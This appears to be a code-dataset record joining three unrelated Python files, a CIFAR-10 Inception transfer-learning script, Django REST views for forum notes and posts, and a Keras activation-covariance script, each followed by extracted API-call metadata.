training_images, training_cls_integers, trainig_one_hot_labels = cifar10.load_training_data()
print('Loading the test set...')
testing_images, testing_cls_integers, testing_one_hot_labels = cifar10.load_test_data()
print("-Number of images in the training set:\t\t{}".format(len(training_images)))
print("-Number of images in the testing set:\t\t{}".format(len(testing_images)))
def plot_imgs(imgs, true_class, predicted_class=None):
assert len(imgs) == len(true_class)
# Creating a placeholders for 9 subplots
fig, axes = plt.subplots(3, 3)
# Adjustting spacing.
if predicted_class is None:
hspace = 0.3
else:
hspace = 0.6
fig.subplots_adjust(hspace=hspace, wspace=0.3)
for i, ax in enumerate(axes.flat):
# There may be less than 9 images, ensure it doesn't crash.
if i < len(imgs):
# Plot image.
ax.imshow(imgs[i],
interpolation='nearest')
# Get the actual name of the true class from the class_names array
true_class_name = class_names[true_class[i]]
# Showing labels for the predicted and true classes
if predicted_class is None:
xlabel = "True: {0}".format(true_class_name)
else:
# Name of the predicted class.
predicted_class_name = class_names[predicted_class[i]]
xlabel = "True: {0}\nPred: {1}".format(true_class_name, predicted_class_name)
ax.set_xlabel(xlabel)
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
plt.show()
# get the first 9 images in the test set
imgs = testing_images[0:9]
# Get the integer representation of the true class.
true_class = testing_cls_integers[0:9]
# Plotting the images
plot_imgs(imgs=imgs, true_class=true_class)
print('Downloading the pretrained inception v3 model')
inception.maybe_download()
# Loading the inception model so that we can inialized it with the pretrained weights and customize for our model
inception_model = inception.Inception()
file_path_train = os.path.join(cifar10.data_path, 'inception_cifar10_train.pkl')
file_path_test = os.path.join(cifar10.data_path, 'inception_cifar10_test.pkl')
print("Processing Inception transfer-values for the training images of Cifar-10 ...")
# First we need to scale the imgs to fit the Inception model requirements as it requires all pixels to be from 0 to 255,
# while our training examples of the CIFAR-10 pixels are between 0.0 and 1.0
imgs_scaled = training_images * 255.0
# Checking if the transfer-values for our training images are already calculated and loading them, if not calcaulate and save them.
transfer_values_training = transfer_values_cache(cache_path=file_path_train,
images=imgs_scaled,
model=inception_model)
print("Processing Inception transfer-values for the testing images of Cifar-10 ...")
# First we need to scale the imgs to fit the Inception model requirements as it requires all pixels to be from 0 to 255,
# while our training examples of the CIFAR-10 pixels are between 0.0 and 1.0
imgs_scaled = testing_images * 255.0
# Checking if the transfer-values for our training images are already calculated and loading them, if not calcaulate and save them.
transfer_values_testing = transfer_values_cache(cache_path=file_path_test,
images=imgs_scaled,
model=inception_model)
print('Shape of the training set transfer values...')
print(transfer_values_training.shape)
print('Shape of the testing set transfer values...')
print(transfer_values_testing.shape)
def plot_transferValues(ind):
print("Original input image:")
# Plot the image at index ind of the test set.
plt.imshow(testing_images[ind], interpolation='nearest')
plt.show()
print("Transfer values using Inception model:")
# Visualize the transfer values as an image.
transferValues_img = transfer_values_testing[ind]
transferValues_img = transferValues_img.reshape((32, 64))
# Plotting the transfer values image.
plt.imshow(transferValues_img, interpolation='nearest', cmap='Reds')
plt.show()
plot_transferValues(ind=15)
pca_obj = PCA(n_components=2)
subset_transferValues = transfer_values_training[0:3000]
cls_integers = testing_cls_integers[0:3000]
print('Shape of a subset form the transfer values...')
print(subset_transferValues.shape)
reduced_transferValues = pca_obj.fit_transform(subset_transferValues)
print('Shape of the reduced version of the transfer values...')
print(reduced_transferValues.shape)
def plot_reduced_transferValues(transferValues, cls_integers):
# Create a color-map with a different color for each class.
c_map = color_map.rainbow(np.linspace(0.0, 1.0, num_classes))
# Getting the color for each sample.
colors = c_map[cls_integers]
# Getting the x and y values.
x_val = transferValues[:, 0]
y_val = transferValues[:, 1]
# Plot the transfer values in a scatter plot
plt.scatter(x_val, y_val, color=colors)
plt.show()
plot_reduced_transferValues(reduced_transferValues, cls_integers)
pca_obj = PCA(n_components=50)
transferValues_50d = pca_obj.fit_transform(subset_transferValues)
tsne_obj = TSNE(n_components=2)
reduced_transferValues = tsne_obj.fit_transform(transferValues_50d)
print('Shape of the reduced version of the transfer values using t-SNE method...')
print(reduced_transferValues.shape)
plot_reduced_transferValues(reduced_transferValues, cls_integers)
transferValues_arrLength = inception_model.transfer_len
input_values = tf.placeholder(tf.float32, shape=[None, transferValues_arrLength], name='input_values')
y_actual = tf.placeholder(tf.float32, shape=[None, num_classes], name='y_actual')
y_actual_cls = tf.argmax(y_actual, axis=1)
def new_weights(shape):
return tf.Variable(tf.truncated_normal(shape, stddev=0.05))
def new_biases(length):
return tf.Variable(tf.constant(0.05, shape=[length]))
def new_fc_layer(input, # The previous layer.
num_inputs, # Num. inputs from prev. layer.
num_outputs, # Num. outputs.
use_relu=True): # Use Rectified Linear Unit (ReLU)?
# Create new weights and biases.
weights = new_weights(shape=[num_inputs, num_outputs])
biases = new_biases(length=num_outputs)
# Calculate the layer as the matrix multiplication of
# the input and weights, and then add the bias-values.
layer = tf.matmul(input, weights) + biases
# Use ReLU?
if use_relu:
layer = tf.nn.relu(layer)
return layer
# First fully-connected layer.
layer_fc1 = new_fc_layer(input=input_values,
num_inputs=2048,
num_outputs=1024,
use_relu=True)
# Second fully-connected layer.
layer_fc2 = new_fc_layer(input=layer_fc1,
num_inputs=1024,
num_outputs=num_classes,
use_relu=False)
# Predicted class-label.
y_predicted = tf.nn.softmax(layer_fc2)
# Cross-entropy for the classification of each image.
cross_entropy = \
tf.nn.softmax_cross_entropy_with_logits(logits=layer_fc2,
labels=y_actual)
# Loss aka. cost-measure.
# This is the scalar value that must be minimized.
loss = tf.reduce_mean(cross_entropy)
step = tf.Variable(initial_value=0,
name='step', trainable=False)
optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss, step)
y_predicted_cls = tf.argmax(y_predicted, axis=1)
correct_prediction = tf.equal(y_predicted_cls, y_actual_cls)
model_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
session = tf.Session()
session.run(tf.global_variables_initializer())
training_batch_size = 32
def select_random_batch():
# Number of images (transfer-values) in the training-set.
num_imgs = len(transfer_values_training)
# Create a random index.
ind = np.random.choice(num_imgs,
size=training_batch_size,
replace=False)
# Use the random index to select random x and y-values.
# We use the transfer-values instead of images as x-values.
x_batch = transfer_values_training[ind]
y_batch = trainig_one_hot_labels[ind]
return x_batch, y_batch
def optimize(num_iterations):
for i in range(num_iterations):
# Selectin a random batch of images for training
# where the transfer values of the images will be stored in input_batch
# and the actual labels of those batch of images will be stored in y_actual_batch
input_batch, y_actual_batch = select_random_batch()
# storing the batch in a dict with the proper names
# such as the input placeholder variables that we define above.
feed_dict = {input_values: input_batch,
y_actual: y_actual_batch}
# Now we call the optimizer of this batch of images
# TensorFlow will automatically feed the values of the dict we created above
# to the model input placeholder variables that we defined above.
i_global, _ = session.run([step, optimizer],
feed_dict=feed_dict)
# print the accuracy every 100 steps.
if (i_global % 100 == 0) or (i == num_iterations - 1):
# Calculate the accuracy on the training-batch.
batch_accuracy = session.run(model_accuracy,
feed_dict=feed_dict)
msg = "Step: {0:>6}, Training Accuracy: {1:>6.1%}"
print(msg.format(i_global, batch_accuracy))
def plot_errors(cls_predicted, cls_correct):
# cls_predicted is an array of the predicted class-number for
# all images in the test-set.
# cls_correct is an array with boolean values to indicate
# whether is the model predicted the correct class or not.
# Negate the boolean array.
incorrect = (cls_correct == False)
# Get the images from the test-set that have been
# incorrectly classified.
incorrectly_classified_images = testing_images[incorrect]
# Get the predicted classes for those images.
cls_predicted = cls_predicted[incorrect]
# Get the true classes for those images.
true_class = testing_cls_integers[incorrect]
n = min(9, len(incorrectly_classified_images))
# Plot the first n images.
plot_imgs(imgs=incorrectly_classified_images[0:n],
true_class=true_class[0:n],
predicted_class=cls_predicted[0:n])
def plot_confusionMatrix(cls_predicted):
# cls_predicted array of all the predicted
# classes numbers in the test.
# Call the confucion matrix of sklearn
cm = confusion_matrix(y_true=testing_cls_integers,
y_pred=cls_predicted)
# Printing the confusion matrix
for i in range(num_classes):
# Append the class-name to each line.
class_name = "({}) {}".format(i, class_names[i])
print(cm[i, :], class_name)
# labeling each column of the confusion matrix with the class number
cls_numbers = [" ({0})".format(i) for i in range(num_classes)]
print("".join(cls_numbers))
# Split the data-set in batches of this size to limit RAM usage.
batch_size = 128
def predict_class(transferValues, labels, cls_true):
# Number of images.
num_imgs = len(transferValues)
# Allocate an array for the predicted classes which
# will be calculated in batches and filled into this array.
cls_predicted = np.zeros(shape=num_imgs, dtype=np.int)
# Now calculate the predicted classes for the batches.
# We will just iterate through all the batches.
# There might be a more clever and Pythonic way of doing this.
# The starting index for the next batch is denoted i.
i = 0
while i < num_imgs:
# The ending index for the next batch is denoted j.
j = min(i + batch_size, num_imgs)
# Create a feed-dict with the images and labels
# between index i and j.
feed_dict = {input_values: transferValues[i:j],
y_actual: labels[i:j]}
# Calculate the predicted class using TensorFlow.
cls_predicted[i:j] = session.run(y_predicted_cls, feed_dict=feed_dict)
# Set the start-index for the next batch to the
# end-index of the current batch.
i = j
# Create a boolean array whether each image is correctly classified.
correct = [a == p for a, p in zip(cls_true, cls_predicted)]
print(type(correct))
return correct, cls_predicted
def predict_class_test():
return predict_class(transferValues = transfer_values_testing,
labels = trainig_one_hot_labels,
cls_true = training_cls_integers)
def classification_accuracy(correct):
# When averaging a boolean array, False means 0 and True means 1.
# So we are calculating: number of True / len(correct) which is
# the same as the classification accuracy.
# Return the classification accuracy
# and the number of correct classifications.
return np.mean(correct), np.sum(correct)
def test_accuracy(show_example_errors=False,
show_confusion_matrix=False):
# For all the images in the test-set,
# calculate the predicted classes and whether they are correct.
correct, cls_pred = predict_class_test()
print(type(correct))
# Classification accuracypredict_class_test and the number of correct classifications.
accuracy, num_correct = classification_accuracy(correct)
# Number of images being classified.
num_images = len(correct)
# Print the accuracy.
msg = "Test set accuracy: {0:.1%} ({1} / {2})"
print(msg.format(accuracy, num_correct, num_images))
# Plot some examples of mis-classifications, if desired.
if show_example_errors:
print("Example errors:")
plot_errors(cls_predicted=cls_pred, cls_correct=correct)
# Plot the confusion matrix, if desired.
if show_confusion_matrix:
print("Confusion Matrix:")
plot_confusionMatrix(cls_predicted=cls_pred)
test_accuracy(show_example_errors=True,
show_confusion_matrix=True)
optimize(num_iterations=1000)
test_accuracy(show_example_errors=True,
show_confusion_matrix=True) | [
"tensorflow.equal",
"tensorflow.nn.softmax",
"cifar10.load_training_data",
"inception.Inception",
"tensorflow.reduce_mean",
"tensorflow.cast",
"matplotlib.pyplot.imshow",
"numpy.mean",
"sklearn.decomposition.PCA",
"tensorflow.placeholder",
"tensorflow.Session",
"inception.maybe_download",
"s... | [((574, 610), 'cifar10.maybe_download_and_extract', 'cifar10.maybe_download_and_extract', ([], {}), '()\n', (608, 610), False, 'import cifar10\n'), ((626, 652), 'cifar10.load_class_names', 'cifar10.load_class_names', ([], {}), '()\n', (650, 652), False, 'import cifar10\n'), ((775, 803), 'cifar10.load_training_data', 'cifar10.load_training_data', ([], {}), '()\n', (801, 803), False, 'import cifar10\n'), ((901, 925), 'cifar10.load_test_data', 'cifar10.load_test_data', ([], {}), '()\n', (923, 925), False, 'import cifar10\n'), ((2629, 2655), 'inception.maybe_download', 'inception.maybe_download', ([], {}), '()\n', (2653, 2655), False, 'import inception\n'), ((2789, 2810), 'inception.Inception', 'inception.Inception', ([], {}), '()\n', (2808, 2810), False, 'import inception\n'), ((2830, 2892), 'os.path.join', 'os.path.join', (['cifar10.data_path', '"""inception_cifar10_train.pkl"""'], {}), "(cifar10.data_path, 'inception_cifar10_train.pkl')\n", (2842, 2892), False, 'import os\n'), ((2910, 2971), 'os.path.join', 'os.path.join', (['cifar10.data_path', '"""inception_cifar10_test.pkl"""'], {}), "(cifar10.data_path, 'inception_cifar10_test.pkl')\n", (2922, 2971), False, 'import os\n'), ((3456, 3553), 'inception.transfer_values_cache', 'transfer_values_cache', ([], {'cache_path': 'file_path_train', 'images': 'imgs_scaled', 'model': 'inception_model'}), '(cache_path=file_path_train, images=imgs_scaled, model\n =inception_model)\n', (3477, 3553), False, 'from inception import transfer_values_cache\n'), ((4122, 4218), 'inception.transfer_values_cache', 'transfer_values_cache', ([], {'cache_path': 'file_path_test', 'images': 'imgs_scaled', 'model': 'inception_model'}), '(cache_path=file_path_test, images=imgs_scaled, model=\n inception_model)\n', (4143, 4218), False, 'from inception import transfer_values_cache\n'), ((5073, 5092), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': '(2)'}), '(n_components=2)\n', (5076, 5092), False, 'from sklearn.decomposition 
import PCA\n'), ((6016, 6036), 'sklearn.decomposition.PCA', 'PCA', ([], {'n_components': '(50)'}), '(n_components=50)\n', (6019, 6036), False, 'from sklearn.decomposition import PCA\n'), ((6114, 6134), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)'}), '(n_components=2)\n', (6118, 6134), False, 'from sklearn.manifold import TSNE\n'), ((6463, 6555), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, transferValues_arrLength]', 'name': '"""input_values"""'}), "(tf.float32, shape=[None, transferValues_arrLength], name=\n 'input_values')\n", (6477, 6555), True, 'import tensorflow as tf\n'), ((6562, 6632), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, num_classes]', 'name': '"""y_actual"""'}), "(tf.float32, shape=[None, num_classes], name='y_actual')\n", (6576, 6632), True, 'import tensorflow as tf\n'), ((6648, 6675), 'tensorflow.argmax', 'tf.argmax', (['y_actual'], {'axis': '(1)'}), '(y_actual, axis=1)\n', (6657, 6675), True, 'import tensorflow as tf\n'), ((7953, 7977), 'tensorflow.nn.softmax', 'tf.nn.softmax', (['layer_fc2'], {}), '(layer_fc2)\n', (7966, 7977), True, 'import tensorflow as tf\n'), ((8055, 8129), 'tensorflow.nn.softmax_cross_entropy_with_logits', 'tf.nn.softmax_cross_entropy_with_logits', ([], {'logits': 'layer_fc2', 'labels': 'y_actual'}), '(logits=layer_fc2, labels=y_actual)\n', (8094, 8129), True, 'import tensorflow as tf\n'), ((8263, 8292), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['cross_entropy'], {}), '(cross_entropy)\n', (8277, 8292), True, 'import tensorflow as tf\n'), ((8301, 8359), 'tensorflow.Variable', 'tf.Variable', ([], {'initial_value': '(0)', 'name': '"""step"""', 'trainable': '(False)'}), "(initial_value=0, name='step', trainable=False)\n", (8312, 8359), True, 'import tensorflow as tf\n'), ((8482, 8512), 'tensorflow.argmax', 'tf.argmax', (['y_predicted'], {'axis': '(1)'}), '(y_predicted, axis=1)\n', (8491, 8512), True, 'import tensorflow as tf\n'), ((8534, 
8573), 'tensorflow.equal', 'tf.equal', (['y_predicted_cls', 'y_actual_cls'], {}), '(y_predicted_cls, y_actual_cls)\n', (8542, 8573), True, 'import tensorflow as tf\n'), ((8659, 8671), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (8669, 8671), True, 'import tensorflow as tf\n'), ((1250, 1268), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(3)', '(3)'], {}), '(3, 3)\n', (1262, 1268), True, 'import matplotlib.pyplot as plt\n'), ((2334, 2344), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2342, 2344), True, 'import matplotlib.pyplot as plt\n'), ((4611, 4667), 'matplotlib.pyplot.imshow', 'plt.imshow', (['testing_images[ind]'], {'interpolation': '"""nearest"""'}), "(testing_images[ind], interpolation='nearest')\n", (4621, 4667), True, 'import matplotlib.pyplot as plt\n'), ((4672, 4682), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4680, 4682), True, 'import matplotlib.pyplot as plt\n'), ((4949, 5017), 'matplotlib.pyplot.imshow', 'plt.imshow', (['transferValues_img'], {'interpolation': '"""nearest"""', 'cmap': '"""Reds"""'}), "(transferValues_img, interpolation='nearest', cmap='Reds')\n", (4959, 5017), True, 'import matplotlib.pyplot as plt\n'), ((5022, 5032), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5030, 5032), True, 'import matplotlib.pyplot as plt\n'), ((5882, 5921), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_val', 'y_val'], {'color': 'colors'}), '(x_val, y_val, color=colors)\n', (5893, 5921), True, 'import matplotlib.pyplot as plt\n'), ((5926, 5936), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5934, 5936), True, 'import matplotlib.pyplot as plt\n'), ((8607, 8646), 'tensorflow.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (8614, 8646), True, 'import tensorflow as tf\n'), ((8684, 8717), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (8715, 8717), True, 'import tensorflow as tf\n'), ((8920, 8987), 
'numpy.random.choice', 'np.random.choice', (['num_imgs'], {'size': 'training_batch_size', 'replace': '(False)'}), '(num_imgs, size=training_batch_size, replace=False)\n', (8936, 8987), True, 'import numpy as np\n'), ((11696, 11763), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', ([], {'y_true': 'testing_cls_integers', 'y_pred': 'cls_predicted'}), '(y_true=testing_cls_integers, y_pred=cls_predicted)\n', (11712, 11763), False, 'from sklearn.metrics import confusion_matrix\n'), ((12511, 12549), 'numpy.zeros', 'np.zeros', ([], {'shape': 'num_imgs', 'dtype': 'np.int'}), '(shape=num_imgs, dtype=np.int)\n', (12519, 12549), True, 'import numpy as np\n'), ((5616, 5650), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1.0)', 'num_classes'], {}), '(0.0, 1.0, num_classes)\n', (5627, 5650), True, 'import numpy as np\n'), ((6724, 6763), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['shape'], {'stddev': '(0.05)'}), '(shape, stddev=0.05)\n', (6743, 6763), True, 'import tensorflow as tf\n'), ((6813, 6846), 'tensorflow.constant', 'tf.constant', (['(0.05)'], {'shape': '[length]'}), '(0.05, shape=[length])\n', (6824, 6846), True, 'import tensorflow as tf\n'), ((7358, 7383), 'tensorflow.matmul', 'tf.matmul', (['input', 'weights'], {}), '(input, weights)\n', (7367, 7383), True, 'import tensorflow as tf\n'), ((7443, 7460), 'tensorflow.nn.relu', 'tf.nn.relu', (['layer'], {}), '(layer)\n', (7453, 7460), True, 'import tensorflow as tf\n'), ((8399, 8443), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': '(0.0001)'}), '(learning_rate=0.0001)\n', (8421, 8443), True, 'import tensorflow as tf\n'), ((14099, 14115), 'numpy.mean', 'np.mean', (['correct'], {}), '(correct)\n', (14106, 14115), True, 'import numpy as np\n'), ((14117, 14132), 'numpy.sum', 'np.sum', (['correct'], {}), '(correct)\n', (14123, 14132), True, 'import numpy as np\n')] |
from rest_framework.exceptions import NotFound, PermissionDenied
from rest_framework.generics import (
CreateAPIView,
DestroyAPIView,
RetrieveUpdateAPIView,
)
from .permissions import (
IsAdminOrModeratorOrReadOnly,
IsOwnerOrAdminOrModeratorOrReadOnly,
IsOwnerOrReadOnly,
)
from .serializers import (
NoteSerializer,
NoteCreateUpdateSerializer,
PostCreateSerializer,
PostUpdateSerializer,
PostListSerializer,
)
from posts.models import (
Note,
Post,
)
class NoteCreateAPIView(CreateAPIView):
queryset = Note.objects.all()
serializer_class = NoteCreateUpdateSerializer
def perform_create(self, serializer):
post_id = self.request.data['post']
user_id = self.request.user.id
is_admin = self.request.user.is_staff
if serializer.is_valid(raise_exception=True):
is_moderator = Post.objects.filter(
id = post_id,
thread__subforum__moderators = user_id
).exists()
if not (is_admin or is_moderator):
raise PermissionDenied(detail='You do not have permission to perform this action.')
serializer.save(user=self.request.user)
class NoteUpdateAPIView(RetrieveUpdateAPIView):
queryset = Note.objects.all()
serializer_class = NoteCreateUpdateSerializer
permission_classes = (IsAdminOrModeratorOrReadOnly, IsOwnerOrReadOnly)
def perform_update(self, serializer):
serializer.save(user=self.request.user)
class NoteDeleteAPIView(DestroyAPIView):
queryset = Note.objects.all()
serializer_class = NoteSerializer
permission_classes = (IsAdminOrModeratorOrReadOnly, IsOwnerOrReadOnly)
class PostCreateAPIView(CreateAPIView):
queryset = Post.objects.all()
serializer_class = PostCreateSerializer
def perform_create(self, serializer):
serializer.save(user=self.request.user)
class PostUpdateAPIView(RetrieveUpdateAPIView):
queryset = Post.objects.all()
serializer_class = PostUpdateSerializer
permission_classes = (IsOwnerOrAdminOrModeratorOrReadOnly,)
class PostDeleteAPIView(DestroyAPIView):
queryset = Post.objects.all()
serializer_class = PostListSerializer
permission_classes = (IsAdminOrModeratorOrReadOnly,) | [
"posts.models.Post.objects.filter",
"posts.models.Note.objects.all",
"posts.models.Post.objects.all",
"rest_framework.exceptions.PermissionDenied"
] | [((561, 579), 'posts.models.Note.objects.all', 'Note.objects.all', ([], {}), '()\n', (577, 579), False, 'from posts.models import Note, Post\n'), ((1273, 1291), 'posts.models.Note.objects.all', 'Note.objects.all', ([], {}), '()\n', (1289, 1291), False, 'from posts.models import Note, Post\n'), ((1566, 1584), 'posts.models.Note.objects.all', 'Note.objects.all', ([], {}), '()\n', (1582, 1584), False, 'from posts.models import Note, Post\n'), ((1755, 1773), 'posts.models.Post.objects.all', 'Post.objects.all', ([], {}), '()\n', (1771, 1773), False, 'from posts.models import Note, Post\n'), ((1974, 1992), 'posts.models.Post.objects.all', 'Post.objects.all', ([], {}), '()\n', (1990, 1992), False, 'from posts.models import Note, Post\n'), ((2159, 2177), 'posts.models.Post.objects.all', 'Post.objects.all', ([], {}), '()\n', (2175, 2177), False, 'from posts.models import Note, Post\n'), ((1082, 1159), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {'detail': '"""You do not have permission to perform this action."""'}), "(detail='You do not have permission to perform this action.')\n", (1098, 1159), False, 'from rest_framework.exceptions import NotFound, PermissionDenied\n'), ((883, 952), 'posts.models.Post.objects.filter', 'Post.objects.filter', ([], {'id': 'post_id', 'thread__subforum__moderators': 'user_id'}), '(id=post_id, thread__subforum__moderators=user_id)\n', (902, 952), False, 'from posts.models import Note, Post\n')] |
#!/usr/bin/env python
from __future__ import print_function
import sys
sys.path.insert(0, "/home/liangjiang/code/keras-jl-mean/")
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
from keras.models import model_from_json
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils
from keras.callbacks import EarlyStopping, LearningRateScheduler
from keras.regularizers import l2, activity_l1l2
from keras import backend as K
import argparse
import json
import numpy as np
import matplotlib.pyplot as plt
def argparser():
parser = argparse.ArgumentParser()
parser.add_argument("weight_path", action = 'store',
help = "Path of learned weight")
parser.add_argument("--layer", "-l", action = 'store', type = int, default = 1,
dest = 'layer', help = "Layer to be visualized")
return parser
def random_crop(X_train, size = (3, 3), times = 10):
num_samples = times * X_train.shape[0]
print("num_samples: ", num_samples)
row = X_train.shape[2]
col = X_train.shape[3]
crop_row = size[0]
crop_col = size[1]
random_sample = np.random.randint(0, X_train.shape[0], size = num_samples)
print("random_sample: ", random_sample)
random_col_index = np.random.randint(0, row - crop_row + 1, size = num_samples)
print("random_col_index: ", random_col_index)
random_row_index = np.random.randint(0, col - crop_col, size = num_samples)
print("random_row_index: ", random_row_index)
# cropped_x_cols = cropped_x.shape[2]
# cropped_x_rows = cropped_x.shape[3]
crop_x = np.zeros((num_samples, X_train.shape[1], crop_row, crop_col))
for i in range(num_samples):
crop_x[i, :, :, :] = X_train[random_sample[i], :,
random_row_index[i] : random_row_index[i] + crop_row,
random_col_index[i] : random_col_index[i] + crop_col]
# print("crop_x[0]: ", crop_x[0, :, :, :])
return crop_x
def main():
parser = argparser()
args = parser.parse_args()
weight_path = args.weight_path
layer = args.layer
img_rows, img_cols = 32, 32
# the CIFAR10 images are RGB
img_channels = 3
batch_size = 32
nb_classes = 10
model = Sequential()
print("Making model")
model.add(Convolution2D(32, 3, 3, border_mode='same',
input_shape=(img_channels, img_rows, img_cols),
W_regularizer = l2(l = 0.),
b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(Convolution2D(32, 3, 3,
W_regularizer = l2(l = 0.),
b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Convolution2D(64, 3, 3, border_mode='same',
W_regularizer = l2(l = 0.),
b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(Convolution2D(64, 3, 3,
W_regularizer = l2(l = 0.),
b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512, W_regularizer = l2(l = 0.), b_regularizer = l2(l = 0.)))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes, W_regularizer = l2(l = 0.), b_regularizer = l2(l = 0.)))
model.add(Activation('softmax'))
# let's train the model using SGD + momentum (how original).
print("Compiling model")
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=sgd,
metrics=['accuracy'])
print("Going to visualize layer ", layer)
print(model.layers[layer].get_config())
# load learned weight
print("Loading weight")
model.load_weights(weight_path)
weight = model.layers[0].get_weights()
print("shape of weight: ", weight[0].shape)
# generate function to get output at layer to be visualized
for i in range(len(model.layers)):
print(i)
input = model.layers[0].input
output = model.layers[layer].output
func = K.function([K.learning_phase()] + [input], output)
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
# im = X_train[100, :, :, :]
# im = np.swapaxes(im, 0, 2)
# im = np.swapaxes(im, 0, 1)
# plt.figure(1)
# plt.imshow(im)
# plt.show()
# sys.exit()
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print(X_test.shape[0], 'test samples')
crop_x = X_test
# crop_x = random_crop(X_test, size = (9, 9), times = 10)
print("shape of crop_x: ", crop_x.shape)
im = crop_x[0, :, :, :]
# print("crop_x[0]", im)
im = im * 255
im = im.astype(np.uint8)
# print("im of uint8: ", im)
fig = plt.figure()
# plt.imshow(im)
# plt.show()
# sys.exit()
# get output from layer to be visualized
# print(X_test[50][1])
activation = func([0] + [crop_x])
print("shape of activation: ", activation.shape)
# max_sample_index = np.argmax(activation, axis = 0)
# max_sample_index = max_sample_index.squeeze()
# np.savetxt("max_sample_index", max_sample_index, fmt = "%d")
# print("shape of max_sample_index: ", max_sample_index.shape)
# # print("max_29", activation[:, 29, :, :])
# for i in range(32):
# ax = fig.add_subplot(8, 4, i + 1, frameon=False)
# ax.set_xticks([])
# ax.set_yticks([])
# ax.xaxis.set_ticks_position('none')
# ax.yaxis.set_ticks_position('none')
# im = crop_x[max_sample_index[i], :, :, :]
# im = np.swapaxes(im, 0, 2)
# im = np.swapaxes(im, 1, 0)
# # print("shape of im: ", im.shape)
# im = im * 255
# im = im.astype(np.uint8)
# ax.imshow(im)
# plt.show()
if activation.ndim == 4:
num = activation.shape[0]
print("num: ", num)
col = activation.shape[1]
print("col: ", col)
map_size = activation.shape[2] * activation.shape[3]
print("map_size: ", map_size)
# temp = np.mean(activation, axis = -1)
# matrix_activation = np.mean(temp, axis = -1)
flatten_activation = np.reshape(activation, (num, col * map_size))
print("shape of flatten_activation: ", flatten_activation.shape)
trans_activation = flatten_activation.transpose()
print("shape of trans_activation: ", trans_activation.shape)
reshape_activation = np.reshape(trans_activation, (col, num * map_size))
print("shape of reshape_activation: ", reshape_activation.shape)
matrix_activation = reshape_activation.transpose()
print("shape of matrix_activation: ", matrix_activation.shape)
mean = np.mean(matrix_activation, axis = 0, keepdims = True)
# mean_p = T.printing.Print('mean')(mean)
std = np.std(matrix_activation, axis = 0, keepdims = True)
normalized_output = (matrix_activation - mean) / std
covariance = np.dot(np.transpose(normalized_output), normalized_output) / num / map_size
else:
num = activation.shape[0]
mean = np.mean(activation, axis = 0, keepdims = True)
# mean_p = T.printing.Print('mean')(mean)
std = np.std(activation, axis = 0, keepdims = True)
normalized_output = (activation - mean) / std
covariance = np.dot(np.transpose(normalized_output), normalized_output) / num
np.savetxt("mean", mean, fmt = "%f")
np.savetxt("std", std, fmt = "%f")
np.savetxt("covariance", covariance, fmt = "%f")
# Script entry point: run main() only when this file is executed directly.
if __name__ == "__main__":
    main()
| [
"sys.path.insert",
"keras.backend.learning_phase",
"keras.optimizers.SGD",
"keras.layers.Activation",
"numpy.mean",
"numpy.reshape",
"argparse.ArgumentParser",
"keras.layers.Flatten",
"keras.datasets.cifar10.load_data",
"keras.layers.MaxPooling2D",
"keras.models.Sequential",
"numpy.savetxt",
... | [((71, 129), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/home/liangjiang/code/keras-jl-mean/"""'], {}), "(0, '/home/liangjiang/code/keras-jl-mean/')\n", (86, 129), False, 'import sys\n'), ((734, 759), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (757, 759), False, 'import argparse\n'), ((1282, 1338), 'numpy.random.randint', 'np.random.randint', (['(0)', 'X_train.shape[0]'], {'size': 'num_samples'}), '(0, X_train.shape[0], size=num_samples)\n', (1299, 1338), True, 'import numpy as np\n'), ((1408, 1466), 'numpy.random.randint', 'np.random.randint', (['(0)', '(row - crop_row + 1)'], {'size': 'num_samples'}), '(0, row - crop_row + 1, size=num_samples)\n', (1425, 1466), True, 'import numpy as np\n'), ((1543, 1597), 'numpy.random.randint', 'np.random.randint', (['(0)', '(col - crop_col)'], {'size': 'num_samples'}), '(0, col - crop_col, size=num_samples)\n', (1560, 1597), True, 'import numpy as np\n'), ((1748, 1809), 'numpy.zeros', 'np.zeros', (['(num_samples, X_train.shape[1], crop_row, crop_col)'], {}), '((num_samples, X_train.shape[1], 